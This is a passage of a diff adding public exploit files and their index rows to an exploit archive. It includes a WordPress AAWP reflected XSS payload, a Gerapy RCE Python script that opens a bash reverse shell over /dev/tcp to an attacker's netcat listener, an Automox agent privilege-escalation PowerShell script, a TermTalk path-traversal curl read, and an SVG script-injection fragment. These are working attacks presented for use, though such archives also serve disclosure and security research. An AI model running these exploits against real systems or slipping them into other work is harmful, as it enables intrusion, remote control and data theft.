<script xlink:href="<script src=CHANGE THIS FOR THE LOCATION OF YOUR SCRIPT></script>"></script>
</svg>

16
exploits/php/webapps/50643.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.
# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.

130
exploits/python/remote/50640.py Executable file
View file

@ -0,0 +1,130 @@
# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 03/01/2022
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/Gerapy/Gerapy
# Version: All versions of Gerapy prior to 0.9.8
# CVE: CVE-2021-43857
# Tested on: Gerapy 0.9.6
# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.
#!/usr/bin/python
import sys
import re
import argparse
import pyfiglet
import requests
import time
import json
import subprocess
banner = pyfiglet.figlet_format("CVE-2021-43857")
print(banner)
print('Exploit for CVE-2021-43857')
print('For: Gerapy < 0.9.8')
login = "admin" #CHANGE ME IF NEEDED
password = "admin" #CHANGE ME IF NEEDED
class Exploit:
def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport
def exploitation(self):
payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}"""
#Login to the app (getting auth token)
url = "http://" + target_ip + ":" + target_port
r = requests.Session()
print("[*] Resolving URL...")
r1 = r.get(url)
time.sleep(3)
print("[*] Logging in to application...")
r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True)
time.sleep(3)
if (r2.status_code == 200):
print('[*] Login successful! Proceeding...')
else:
print('[*] Something went wrong!')
quit()
#Create a header out of auth token (yep, it's bad as it looks)
dict = json.loads(r2.text)
temp_token = 'Token '
temp_token2 = json.dumps(dict['token']).strip('"')
auth_token = {}
auth_token['Authorization'] = temp_token + temp_token2
#Get the project list
print("[*] Getting the project list")
r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True)
time.sleep(3)
if (r3.status_code != 200):
print("[!] Something went wrong! Maybe the token is corrupted?")
quit();
#Parse the project name for a request (yep, it's worse than earlier)
dict = r3.text # [{'name': 'test'}]
dict2 = json.dumps(dict)
dict3 = json.loads(dict2)
dict3 = json.loads(dict3)
name = dict3[0]['name']
print("[*] Found project: " + name)
#use the id to check the project
print("[*] Getting the ID of the project to build the URL")
r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True)
time.sleep(3)
if (r4.status_code != 200):
print("[*] Something went wrong! I can't reach the found project!")
quit();
#format the json to dict
dict = r4.text
dict2 = json.dumps(dict)
dict3 = json.loads(dict2)
dict3 = json.loads(dict3)
id = dict3['id']
print("[*] Found ID of the project: ", id)
time.sleep(1)
#netcat listener
print("[*] Setting up a netcat listener")
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)
#exec the payload
print("[*] Executing reverse shell payload")
print("[*] Watchout for shell! :)")
r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True)
listener.wait()
if (r5.status_code == 200):
print("[*] It worked!")
listener.wait()
else:
print("[!] Something went wrong!")
listener.terminate()
def get_args():
parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP')
parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port')
args = parser.parse_args()
return args
args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()

32
exploits/windows/local/50633.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.trigonesoft.com/
# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
# Tested Version: 3.61
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
TRIGONE Remote System Monitor Server RemoteSystemMonitorService
C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe
Auto
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteSystemMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv
er\RemoteSystemMonitorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TRIGONE Remote System Monitor Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

42
exploits/windows/local/50642.ps1 Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Automox Agent 32 - Local Privilege Escalation
# Date: 13/12/2021
# Exploit Author: Greg Foss
# Writeup: https://www.lacework.com/blog/cve-2021-43326/
# Vendor Homepage: https://www.automox.com/
# Software Link: https://support.automox.com/help/agents
# Version: 31, 32, 33
# Tested on: Windows 10
# Language: PowerShell
# CVE: CVE-2021-43326
New-Item -ItemType Directory -Force -Path $HOME\Desktop\automox\
$payload = "whoami >> $HOME\Desktop\automox\who.txt"
echo ""
echo "Watching for Automox agent interaction..."
echo ""
for (($i = 0); $i -lt 500; $i++) {
if (Test-Path -Path \ProgramData\amagent\execDir*\*.ps1) {
try {
$dir = Get-ChildItem \ProgramData\amagent\execDir* | Select-Object Name
$dir = $dir.name
$file = Get-ChildItem \ProgramData\amagent\$dir\*.ps1 | Select-Object Name
$file = $file.name
(Get-Content -Path \ProgramData\amagent\$dir\$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path \ProgramData\amagent\$dir\$file
cp -r \ProgramData\amagent\$dir $HOME\Desktop\automox\
echo 'popped :-)'
Start-Sleep 5
echo ''
echo 'cloning all powershell script content...'
for (($i = 0); $i -lt 100; $i++) {
cp -r \ProgramData\amagent\* $HOME\Desktop\automox\ -Force
Start-Sleep 1
}
exit
} catch {
throw $_.Exception.Message
}
} else {
echo $i
Start-Sleep 1
}
}

12
exploits/windows/remote/50638.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/
POC
curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts

32
files_exploits.csv
View file

@ -6808,6 +6808,7 @@ id,file,description,date,author,type,platform,port
50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
50535,exploits/windows/dos/50535.py,"Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
50536,exploits/windows/dos/50536.py,"Modbus Slave 7.3.1 - Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",dos,windows,
50613,exploits/hardware/dos/50613.py,"Siemens S7 Layer 2 - Denial of Service (DoS)",1970-01-01,RoseSecurity,dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -11426,6 +11427,8 @@ id,file,description,date,author,type,platform,port
50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows,
50591,exploits/macos/local/50591.py,"Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)",1970-01-01,leonjza,local,macos,
50598,exploits/windows/local/50598.txt,"Microsoft Internet Explorer / ActiveX Control - Security Bypass",1970-01-01,hyp3rlinx,local,windows,
50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18584,6 +18587,12 @@ id,file,description,date,author,type,platform,port
50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java,
50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java,
50599,exploits/windows/remote/50599.txt,"Oliver Library Server v5 - Arbitrary File Download",1970-01-01,"Mandeep Singh",remote,windows,
50618,exploits/multiple/remote/50618.py,"ConnectWise Control 19.2.24707 - Username Enumeration",1970-01-01,"Luca Cuzzolin",remote,multiple,
50620,exploits/hardware/remote/50620.py,"Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",remote,hardware,
50629,exploits/android/remote/50629.py,"AWebServer GhostBuilding 18 - Denial of Service (DoS)",1970-01-01,"Andres Ramos",remote,android,
50638,exploits/windows/remote/50638.txt,"TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Fabiano Golluscio",remote,windows,
50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware,
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44691,3 +44700,26 @@ id,file,description,date,author,type,platform,port
50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",1970-01-01,citril,webapps,php,
50610,exploits/php/webapps/50610.py,"phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50611,exploits/php/webapps/50611.txt,"Exponent CMS 2.6 - Multiple Vulnerabilities",1970-01-01,heinjame,webapps,php,
50612,exploits/php/webapps/50612.txt,"CMSimple 5.4 - Cross Site Scripting (XSS)",1970-01-01,heinjame,webapps,php,
50614,exploits/php/webapps/50614.txt,"RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50615,exploits/php/webapps/50615.txt,"RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50616,exploits/php/webapps/50616.txt,"RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50617,exploits/php/webapps/50617.txt,"WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Gaetano Perrone",webapps,php,
50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",1970-01-01,"Ron Jost",webapps,php,
50621,exploits/php/webapps/50621.py,"Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50622,exploits/php/webapps/50622.py,"Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50623,exploits/php/webapps/50623.py,"Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php,
50624,exploits/php/webapps/50624.py,"WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Liad Levy",webapps,php,
50625,exploits/php/webapps/50625.txt,"Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Akash Patil",webapps,php,
50626,exploits/php/webapps/50626.txt,"SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,php,
50627,exploits/php/webapps/50627.txt,"Nettmp NNT 5.1 - SQLi Authentication Bypass",1970-01-01,"Momen Eldawakhly",webapps,php,
50628,exploits/php/webapps/50628.txt,"Hostel Management System 2.1 - Cross Site Scripting (XSS)",1970-01-01,"Chinmay Divekar",webapps,php,
50630,exploits/php/webapps/50630.txt,"Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)",1970-01-01,twseptian,webapps,php,
50632,exploits/multiple/webapps/50632.txt,"BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,Malcrove,webapps,multiple,
50631,exploits/php/webapps/50631.txt,"Hospitals Patient Records Management System 1.0 - Account TakeOver",1970-01-01,twseptian,webapps,php,
50634,exploits/php/webapps/50634.txt,"Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection",1970-01-01,"Milad karimi",webapps,php,
50635,exploits/php/webapps/50635.py,"Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,n0tme,webapps,php,
50636,exploits/hardware/webapps/50636.py,"Vodafone H-500-s 3.5.10 - WiFi Password Disclosure",1970-01-01,"Daniel Monzón",webapps,hardware,
50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,

Can't render this file because it is too large.